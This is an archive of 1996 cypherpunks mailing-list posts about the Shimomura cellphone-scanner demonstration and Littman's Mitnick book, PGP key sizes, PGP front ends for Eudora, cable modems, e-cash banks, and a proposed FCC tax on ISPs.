For more, see, http://www.isse.gmu.edu/~pfarrell/nist/pdf.nist2.html

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 4 Jan 1996 09:14:32 +0800
To: John Young <jya@pipeline.com>
Subject: Re: New Mitnick Book
Message-ID: <v0213050bad10cd588ef0@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



>   Also please note that you are inaccurate in stating that
>   Tsutomu requested immunity before testifying before
>   Congress on April 1993.

I don't know anything about the accuracy of the rest of the
post, but I was there at
this hearing. Immunity was granted, but it wasn't the same type
of immunity granted
to someone like Oliver North. My recollection is that the
immunity was granted to
allow Tsutomu Shimomura to convert an ordinary cellular phone into a scanner by
typing in the magic combination of numbers. Ordinarily, this
would break the law.
The immunity prevented this from happening. The act was simply
done to demonstrate
just how easy it is to do this. They quickly switched channels
several times and then
turned off the phone. Nothing salicious or interesting came over
the air, alas. It would
have been funny if some bribe deal involving the chairman of the
committee filled the room,
but that only happens in movies.

I don't know who requested the immunity. It could have been John
Gage of Sun Micro who seemed to be running the show. There were
probably transcripts made of the session and for all I know the
Government might even have them around. That would allow us to
get to the bottom of this important detail.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 4 Jan 1996 11:27:02 +0800
To: cypherpunks@toad.com
Subject: Re:US calls for measures against Internet porn
Message-ID: <199601040042.TAA29802@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 03, 1996 14:47:35, 'anonymous-remailer@shell.portal.com' wrote: 
 
 
>My original post, "US calls for measures against Internet porn" was a 
>satire. The entire point was that, by changing a few words in the 
>"China calls for measures against Internet porn" story, a statement by 
>a totalitarian communist regime could be made to look like official US 
>policy. Obviously, the project was a success, as people are taking it 
>seriously in spite of the fact that it had telltale clues, and that 
>the original source was revealed. 
> 
 
I was going to post on this topic, especially on a paraphrase of the
(ostensible) original. I still want to, but let me play either the
skeptical or responsible journalist (reader's choice of adjectives). 
 
Anonymous has *not* revealled the original source as he/it/she claimed.
They have asserted it came from Xinhua news agency. Will Anonymous post a
pointer to where we can access on the internet the original? News feed,
date, and time of posting, as well as message ID should suffice. 
 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 4 Jan 1996 20:26:50 +0800
To: Peter Monta <cypherpunks@toad.com
Subject: Re: Guerilla ISPs
Message-ID: <199601040341.TAA19626@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:07 1/3/96 -0800, Peter Monta wrote:
>I'm skeptical about cable modems---few cable providers have adequate
>return paths, and everyone competes for the downlink bandwidth.
>Broadcast is not the right architecture.

I would be skeptical too, but the cable modems I reviewed in a marketing
research focus group were from HP.  My view of HP's reputation is that when
they claim their equipment does something, it does.  Does anyone want to
offer counter examples?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Thu, 4 Jan 1996 11:33:25 +0800
To: jim bell <alano@teleport.com>
Subject: Re: Windows Eudora and PGP
Message-ID: <2.2.16.19960104004641.084f6bfe@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:27 PM 1/3/96 -0800, jim bell wrote:
>At 10:24 AM 1/3/96 -0800, you wrote:
>>At 09:43 AM 1/3/96 -0800, Jim Bell wrote:
>>
>>>(BTW, I use Eudora, and I have PGP.  Could somebody explain how to PGP-sign
>>>messages, ideally EASILY?)
>>
>>I use Eudora as well.  It is not as easy as I would like.  You have a couple
>>of options:
>>
>>1)  Use cut-and-paste into Private Idaho.  Private Idaho will allow you to
>>paste back into Eudora.  (Or you can send out from Private Idaho directly.)
>>This option is useful becuase it supports nyms and chaining of remailers.
>>
>>2)  Get one of the standard Windows PGP shells and paste into that.  After
>>signing, you will have to repaste into Eudora again.
>>
>>These seem to be the only options.  I am not certain if there is a standard
>>DDE or OLE interface that could be used to feed message information back and
>>forth between Eudora and some other app.  There have been a number of
>>promises of Eudora/PGP integration, but nothing has materialized yet.
>
>[sigh]  Just what I thought, no easy solutions.  Well, for now I'll just
>skip signing; I haven't had any problem (that I know of...knock on silicon)
>with forged messages, and my normal posts are so enthusiastically anarchical
>and inflammatory that the only way anybody could really embarrass me is to
>forge a message, ostensibly from me, saying I agreed with some governmental
>activity somewhere.
>
>
>>There are no easy answers I know of...
>>
>>If you need a copy of Private Idaho, I can point you to a web site or bring
>>a copy along to the meeting on the 20th.
>
>Please do...
>
>
>
I have heard that their are alpha releases currentky geing worked on at
quest/qualcomm. But i would have to say before they come out your best bet
to pgp and eudora is either pidaho or just use it in dos. pidaho is a great
front end. A lot better than any others out their.

 I have also heard that ViaCrypt is a good alternative. But I am not sure.
Has anyone else out there heard anything good/bad about ViaCrypt?
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Thu, 4 Jan 1996 17:09:43 +0800
To: "Michael C. Peponis" <mianigand@unique.outlook.net>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <199601040009.SAA07299@unique.outlook.net>
Message-ID: <9601040052.AA07122@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: "Michael C. Peponis" <mianigand@unique.outlook.net>
    Date: Thu, 4 Jan 1996 05:17:35 +0000
    
    > Why is there a limit to the size of the key anyway? It's too bad PGP 
    > doesn't support any size key (within reason).
    
    Within reason is the Key Phrase.  Even with a Pentium 90, I notice a 
    considerable lag in decrypting messages that have been encrypted with 
    a key larger than 2047/8.
    
    Even if you have a fast machine, if the person recieving the message 
    could wait a long time to decrypt you 4096 byte encrypted message.

Another point to realize is that PGP uses a combination of ciphers.
When encrypting, the RSA key is only used to encrypt an IDEA key.
That IDEA key is used to encrypt your message.  Somewhere between 2048
and 4096, you're making the RSA key stronger (harder to brute force)
than the IDEA key.  At that point, the extra time that you're using
for super-big RSA keys is totally wasted.

A similar argument applies to authentication, but then you're
comparing RSA and MD5, although I believe the argument holds for even
smaller RSA keys than in the RSA-IDEA comparison.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOsj8JNR+/jb2ZlNAQGcRgP+JONF2g2Nw7SIKvcfCKurvS5WQ0WWjQmd
H7NjkVjtjf947o1OKUMDYdKWTjSmvV//hdRloWz3T4kaS9FCLvzFbTZLNRtz33ic
kcX0XIDYZ0pohMo98IaeXS/odB+tmo8jPTfZeC2lBuv4PRphSLypxDrR0VmQX2ld
EVOl6RUBknw=
=l/T7
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 4 Jan 1996 20:28:14 +0800
To: cypherpunks@toad.com
Subject: Re: Duplicate messages
Message-ID: <2.2.32.19960104035542.0093e29c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:40 PM 1/3/96 -0600, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>> Has everyone else been getting two messages for the price of one?
>
>I've gotten several pieces of email from people who are getting two 
>copies of stuff I post, but I've looked at my mailer (sendmail 8.6.10) 
>and it's not sending out dups to toad.com, as far as I can tell.
>
>If people continue to get dups from just me, then I'll have to install a 
>sendmail front-end to log outgoing email or something...

It is not just you.  I am getting dups from about half the list.
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 4 Jan 1996 12:20:25 +0800
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: New Mitnick Book
In-Reply-To: <v0213050bad10cd588ef0@[199.125.128.5]>
Message-ID: <Pine.SOL.3.91.960103200035.4910C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jan 1996, Peter Wayner wrote:

> I don't know who requested the immunity. It could have been John
> Gage of Sun Micro who seemed to be running the show. There were
> probably transcripts made of the session and for all I know the
> Government might even have them around. That would allow us to
> get to the bottom of this important detail.

Yes, it was John who set this up (I remember him talking about the 
arrangements he was making just before the actual session).

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 4 Jan 1996 10:03:05 +0800
To: cypherpunks@toad.com
Subject: Re: New Mitnick Book
Message-ID: <199601040114.UAA21383@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by pcw@access.digex.net (Peter Wayner) on 
Wed, 3 Jan  7:39 PM


   Here's Littman on immunity for Shimomura (describing telco
   tracking Mitnick):

   Shimomura's brought along his own hacker's scanning rig.
   It's pretty basic, just an Oki 900 cellular phone and a
   hardware interface to his tiny HP Palmtop. One of
   Shimomura's friends -- who happens to be under federal
   indictment for illegal hacking -- cooked up the interface
   and helped write the software.

   Shimomura likes his computer-controlled cellular phone, but
   its use for tracking is limited. Its main purpose is to
   lock on a call and eavesdrop. It is illegal to use it to
   eavesdrop on calls. That's why Shimomura needed immunity
   from prosecution when he demonstrated his Oki scanner
   before Congress a couple of years ago. (p. 6)

------

[Still reading ... ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 4 Jan 1996 04:11:27 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve *hasn't* banned newsgroups
Message-ID: <199601031920.UAA08670@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Duncan Frissell 1/3/96 1:02 PM:

>You mean that the thirty-some odd open news servers listed on
>http://dana.ucc.nau.edu/~jwa/open-sites.html might get swamped.  Then the
>CIS refugees will be forced to pay Sameer the massive $12.50 (?) a month for
>a net-access-only account and read off of c2.org's server.  (Or any of the
>thousands of sites worldwide one can open a shell account on.)

   CIS refugees aren't the only people who use or need free NNTP servers:

>  Here's what you can do for $208: get a used XT with two floppy drives for
>  $70; a 2400-baud internal modem (new at a local computer show) for $18 
>  (it comes with free communications software); and an e-mail and Usenet
>  news-reading account for $10 per month. 

   Sound familiar?     

Hieronymous


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOrWzb3g0mNE55u1AQEH5AH8D6P1BPIMpLTq0JWiwLz3na4Rgv3QeymK
zeNbKnbtyDkJ2h9MW8+GiPKY7uOsdZsU34eOdFtmP7/+OV0naO8AAw==
=fAWj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 4 Jan 1996 09:55:24 +0800
To: John Young <jya@pipeline.com>
Subject: Re: New Mitnick Book
Message-ID: <v0213050cad10ddb566c2@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>From the Littman book:

>   Shimomura likes his computer-controlled cellular phone, but
>   its use for tracking is limited. Its main purpose is to
>   lock on a call and eavesdrop. It is illegal to use it to
>   eavesdrop on calls. That's why Shimomura needed immunity
>   from prosecution when he demonstrated his Oki scanner
>   before Congress a couple of years ago. (p. 6)
>
Well, here's another minor error. At the hearing, Shimomura
just used a new, shrink wrapped cell phone. I think it was an AT&T
model, but my memory is faint on these details. I'm pretty sure it
wasn't an off the shelf Oki 900. Half the point was to show just
how easy it was. He didn't even bother to hook the
cell phone up to a laptop or palmtop. Just a few button pushes and
instant scanner. I tried to get him to tell me the right buttons afterwards,
but he was too busy and didn't answer. Sigh.

But aside from the brand name of the phone, Littman's sentence seems
accurate according to my recollection. The transcript should settle
all of this.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 4 Jan 1996 20:38:48 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: New Mitnick Book
Message-ID: <199601040434.UAA22197@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>Well, here's another minor error. At the hearing, Shimomura
>just used a new, shrink wrapped cell phone. I think it was an AT&T
>model, but my memory is faint on these details. I'm pretty sure it
>wasn't an off the shelf Oki 900. Half the point was to show just
>how easy it was. He didn't even bother to hook the
>cell phone up to a laptop or palmtop. Just a few button pushes and
>instant scanner. I tried to get him to tell me the right buttons afterwards,
>but he was too busy and didn't answer. Sigh.

The AT&T 3730 model is identical to the Oki 900 and contains the same rich
set of features.  The key sequences to enter test mode and scan cell
channels are the same.  The commands are relatively well documented in most
cell hacking archive sites.

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 4 Jan 1996 11:03:43 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <199601040246.UAA14351@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


test, please ignore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 4 Jan 1996 11:07:40 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <199601040247.UAA14402@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


test, please ignore - 1 copy sent.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jan 1996 13:23:33 +0800
To: "Michael C. Peponis" <mianigand@unique.outlook.net>
Subject: Re: 2047 bit keys in PGP
Message-ID: <m0tXhdo-00092mC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:17 AM 1/4/96 +0000, you wrote:

>
>> Why is there a limit to the size of the key anyway? It's too bad PGP 
>> doesn't support any size key (within reason).
>
>Within reason is the Key Phrase.  Even with a Pentium 90, I notice a 
>considerable lag in decrypting messages that have been encrypted with 
>a key larger than 2047/8.
>
>Even if you have a fast machine, if the person recieving the message 
>could wait a long time to decrypt you 4096 byte encrypted message.

It seems to me that the best argument AGAINST supporting (and using) keys
greater than 2048 bits is the false sense of security created.  Even
1024-bit keys will probably be safe for decades if just the algorithm is
concerned.  Far more threatening are various other attacks, including RF
snooping in combination with specialized viruses, as well as black-bag jobs
on hardware.

Why build a castle with a front wall a mile high when the back wall is a
5-foot chain-link fence?!?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jan 1996 13:23:15 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Guerilla ISPs
Message-ID: <m0tXhdq-00092uC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:07 PM 1/3/96 -0800, you wrote:
>Thomas Edwards writes:
>
>> [ microcellular nets ]
>>
>> But how can these things compete with @Home, which is promising 10 Mbps 
>> in and 128 kbps out of homes with cable modems?  
>
>I'm skeptical about cable modems---few cable providers have adequate
>return paths, and everyone competes for the downlink bandwidth.
>Broadcast is not the right architecture.
>

Even admittedly with no evidence, I tend to disagree.  I think the world
needs cable-driven "mostly-one-way" Internet access for the same reason we
need both:

1.  Magazines/books (few to many) vs. snail-mail (1-to-1 communication).
2.  Television/radio (few to many)  vs. telephones (1-to-1 communication).

If, as I've heard, you could broadcast 28 mbits per second down a
6-megahertz cable line, that's a lot of "news, weather, and sports" to be
broadcast to EVERYONE, similar to newspapers.  Imagine the entire contents
of USENET,  plus a goodly supply of (encrypted) individual mail, etc.  The
contents of every newspaper in the country, transmitted a few times every
day, etc.

>Any systems in actual operation?  How many users do they support?


No idea.  Wish I knew.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 4 Jan 1996 03:11:29 +0800
To: cypherpunks@toad.com
Subject: Re: Starting an e-cash bank
In-Reply-To: <199512302305.SAA20998@netaxs.com>
Message-ID: <Pine.SOL.3.91.960103204303.5486B-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Dec 1995, Ryan Lackey wrote:

> What would it take to start an anonymous, private, secure, etc. etc. bank
> issuing e-cash, located in a country without taxes/etc.? 

I think this idea of a new e-cash bank or other kind of financial 
institution sounds very good. I have been thinking of the same thing here 
in Estonia, to set up a financial institution issuing e-cash for people 
here, but I think this would not in any way be an easy task. I am not 
very familiar with local legislation about financial and credit 
institutions, but I know that at least for banks the minimum equity 
capital or what you call it must be 50 million Estonian kroons (4 million 
US dollars). But I still think that for issuing e-cash and opening e-cash 
accounts you might not need to have such kind of capital. What does it 
take to be called a bank?

And how easy is it to start a bank in some caribbean country or similar 
tax haven? What are the minimum requirements?

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 4 Jan 1996 11:30:10 +0800
To: cypherpunks@toad.com
Subject: Re:US calls for measures against Internet porn
Message-ID: <199601040158.UAA10766@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 03, 1996 20:54:01, '"Declan B. McCullagh" <declan+@CMU.EDU>' wrote: 
 
 
>Excerpts from internet.cypherpunks: 3-Jan-96 Re:US calls for measures 
>ag.. by tallpaul@pipeline.com  
>> Anonymous has *not* revealled the original source as he/it/she claimed. 
>> They have asserted it came from Xinhua news agency. Will Anonymous post
a 
>> pointer to where we can access on the internet the original? News feed, 
>> date, and time of posting, as well as message ID should suffice.  
> 
>It's been on the AP and Reuters wires, as well as on the CNN web site. 
> 
>-Declan 
> 
> 
 
"newswires" and "web sites" are not pointers to exact quotations. my
question remains unanswered. 
 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 4 Jan 1996 11:30:19 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: NYT's _Unmuzzling the Internet_
In-Reply-To: <199601040312.WAA22282@osceola.gate.net>
Message-ID: <199601040317.VAA16388@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> The FCC is now proposing a tax on ISP's -- in the name of "universal access"
> !?? :O(.
> 
> They claim that since voice can be transmitted over the Internet, it falls
> under the jurisdiction of the FCC.

This is pretty stupid - I mean, even I know that it's all just data.  
Besides, it's irrelevent - if the FCC had jurisdiction over the net 
because it can carry digitized voice, then they could regulate what I 
scream out my back door.  Last time I looked, I didn't need a license to 
broadcast my voice out over the airwaves with my mouth...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOtGryS9AwzY9LDxAQFR9AP/YI62YWJSwikRgLVibKK0VlQ0iL70nz8J
YR5njK2y9r9nN0TZ6B8W+PYxbT3nbhioSHrg1z29U1jOwTaYenwsytTGfRF2S7fe
3j8eZNF0bEnIdZP/7WE11t/t5rXBqdGW8CvvcTDvjBxIgXtsXZtR5bBdnjcObeEF
JFEjkW3afKA=
=Tckk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 4 Jan 1996 18:16:15 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: Duplicate messages
In-Reply-To: <2.2.32.19960104033750.009219b4@mail.teleport.com>
Message-ID: <199601040340.VAA17921@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Has everyone else been getting two messages for the price of one?

I've gotten several pieces of email from people who are getting two 
copies of stuff I post, but I've looked at my mailer (sendmail 8.6.10) 
and it's not sending out dups to toad.com, as far as I can tell.

If people continue to get dups from just me, then I'll have to install a 
sendmail front-end to log outgoing email or something...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOtMRCS9AwzY9LDxAQFbvwQAnIlapjkMlqGc9+DnCfRXBV+OzTzZ39wB
6xq3qiTavHblUsoozvgV9olKFhaBD5xYz9nnt+v8Cms4JyAIOB28DtbMKdRrjcht
bpn3C0Mb7jNV7rXG0QZl3v6DLXTs7JzqnL5leVthNgA58J8FgEgMgpnGaHCCM8tQ
RjAioEEIaXo=
=BJzR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Thu, 4 Jan 1996 23:17:34 +0800
To: jim bell <alano@teleport.com>
Subject: Answer: Windows Eudora and PGP
Message-ID: <2.2.32.19960104024833.006b10e8@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


Run, don't walk, to check out:

   <http://www.panix.com/~jgostl/wpgp>

Qualcomm's own Eudora support team recommended it, and it works seamlessly.
To use it with Eudora, important point: after installing WPGP, go into
Options|Select Keystrokes and  make sure "Use Capture mode" and "Use Select
All" are selected (and "Use Memorizer" should -not- be selected), otherwise
you'll get errors about 'no selected text'.  That's it; you're up and running.

Example of using WPGP: After writing your message as usual in Eudora, to
encrypt simply click on WPGP's "Enc" button and then click on the window
containing your message; that's it, very slick.  Another example: If you get
a PGP-encrypted email and want to reply, just hit Eudora's Reply as usual
(this will ">"-quote the entire original email as usual including the PGP
block), click on WPGP to "Dec"rypt, and click anywhere on your reply
window... it will pick out the PGP block, decrypt it, inform you about valid
signatures etc., and automatically paste the reply back into your window in
the proper place WITH PLAINTEXT PROPERLY QUOTED, as if you'd got the message
straight in the clear and hit 'Reply'.

Highly recommended.

Herb


At 13:27 01.03.1996 -0800, jim bell wrote:
>At 10:24 AM 1/3/96 -0800, you wrote:
>>At 09:43 AM 1/3/96 -0800, Jim Bell wrote:
>>
>>>(BTW, I use Eudora, and I have PGP.  Could somebody explain how to PGP-sign
>>>messages, ideally EASILY?)
>>
>>I use Eudora as well.  It is not as easy as I would like.  You have a couple
>>of options:
>>
>>1)  Use cut-and-paste into Private Idaho.  Private Idaho will allow you to
>>paste back into Eudora.  (Or you can send out from Private Idaho directly.)
>>This option is useful becuase it supports nyms and chaining of remailers.
>>
>>2)  Get one of the standard Windows PGP shells and paste into that.  After
>>signing, you will have to repaste into Eudora again.
>>
>>These seem to be the only options.  I am not certain if there is a standard
>>DDE or OLE interface that could be used to feed message information back and
>>forth between Eudora and some other app.  There have been a number of
>>promises of Eudora/PGP integration, but nothing has materialized yet.
>
>[sigh]  Just what I thought, no easy solutions.  Well, for now I'll just
>skip signing; I haven't had any problem (that I know of...knock on silicon)
>with forged messages, and my normal posts are so enthusiastically anarchical
>and inflammatory that the only way anybody could really embarrass me is to
>forge a message, ostensibly from me, saying I agreed with some governmental
>activity somewhere.
>
>
>>There are no easy answers I know of...
>>
>>If you need a copy of Private Idaho, I can point you to a web site or bring
>>a copy along to the meeting on the 20th.
>
>Please do...
>
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Huntting <huntting@glarp.com>
Date: Thu, 4 Jan 1996 13:14:06 +0800
To: John Young <jya@pipeline.com>
Subject: Re: New Mitnick Book
In-Reply-To: <199601040114.UAA21383@pipe3.nyc.pipeline.com>
Message-ID: <199601040453.VAA00416@misc.glarp.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Shimomura likes his computer-controlled cellular phone, but
>  its use for tracking is limited. Its main purpose is to
>  lock on a call and eavesdrop. It is illegal to use it to
>  eavesdrop on calls. That's why Shimomura needed immunity
>  from prosecution when he demonstrated his Oki scanner
>  before Congress a couple of years ago. (p. 6)

Curious, David Skaggs (R-CO) while arguing against having the Rocky
Flats Grand Jury testify before congress on they're findings pointed
out that congress can only offer immunity from prosecution for a
testimony _about_ crimes they may have committed.

In Shimomura's case the crime was committed in front of congress
as _part_ of his testimony.  One could easily argue, as Skaggs did,
that congress oversteped it's bounds by asking a witness to commit
a crime.  Then again, they're the ones who decide what most of
these crimes are in the first place.


Sorry to stray off topic.
brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jan 1996 03:52:33 +0800
To: Herb Sutter <herbs@connobj.com>
Subject: Re: Answer: Windows Eudora and PGP
Message-ID: <m0tXihQ-00093PC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 PM 1/3/96 -0500, you wrote:
>Run, don't walk, to check out:
>
>   <http://www.panix.com/~jgostl/wpgp>
>
>Qualcomm's own Eudora support team recommended it, and it works seamlessly.
>To use it with Eudora, important point: after installing WPGP,

You make it sound so easy.  Problem is, installing this thing was clunky.
Took me a couple of times to make it even appear to install.

 >go into
>Options|Select Keystrokes and  make sure "Use Capture mode" and "Use Select
>All" are selected 

>(and "Use Memorizer" should -not- be selected),

At least that seems to work...

>< otherwise
>you'll get errors about 'no selected text'.  That's it; you're up and running.

>
>Example of using WPGP: After writing your message as usual in Eudora, to
>encrypt simply click on WPGP's "Enc" button and then click on the window
>containing your message; that's it, very slick.  Another example: If you get
>a PGP-encrypted email and want to reply, just hit Eudora's Reply as usual
>(this will ">"-quote the entire original email as usual including the PGP
>block), click on WPGP to "Dec"rypt, and click anywhere on your reply
>window... it will pick out the PGP block, decrypt it, inform you about valid
>signatures etc., and automatically paste the reply back into your window in
>the proper place WITH PLAINTEXT PROPERLY QUOTED, as if you'd got the message
>straight in the clear and hit 'Reply'.
>
>Highly recommended.
>
>Herb

I apreciate your enthusiasm, but it has failed to work a number of times for
me.  Perhaps you should study your instructions a bit more carefully for
errors.  After I get to the end of the message on Eudora, I select WPGP and
follow your instructions by clicking on the ENC button.  At this point, I
can't maximize Eudora again  to  "click on the window containing your
message" (as  you asked).  The system asks me for my password, I type it,
but when control is returned to Eudora I see neither a signature nor encryption.

Frankly, it appears to me that the biggest threat to our security at this
moment are the programs which ostensibly are supposed to protect it.  I wish
I could be more appreciative.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 4 Jan 1996 11:26:04 +0800
To: cypherpunks@toad.com
Subject: Re: NYT's _Unmuzzling the Internet_
Message-ID: <199601040312.WAA22282@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Vlad"  wrote:

<snip>

>I am all for helping congressmen "get a clue" at this moment in time.
>the Digital Telephony bill is not a declaration of war. when they try
>to tax Cyberspace or get the FCC to regulate it, or outlaw cryptography,
>*that* will be a declaration of war.

I hate to be the bearer of bad news, and I try to resist forwarding
messages from other lists, but on cyberia-L, Mr. Nick Keenan wrote:

<snipped, forwarded message follows>
____________________________________

The FCC is now proposing a tax on ISP's -- in the name of "universal access"
!?? :O(.

They claim that since voice can be transmitted over the Internet, it falls
under the jurisdiction of the FCC.

Read about it in the Dec. 18 issue of Interactive Week
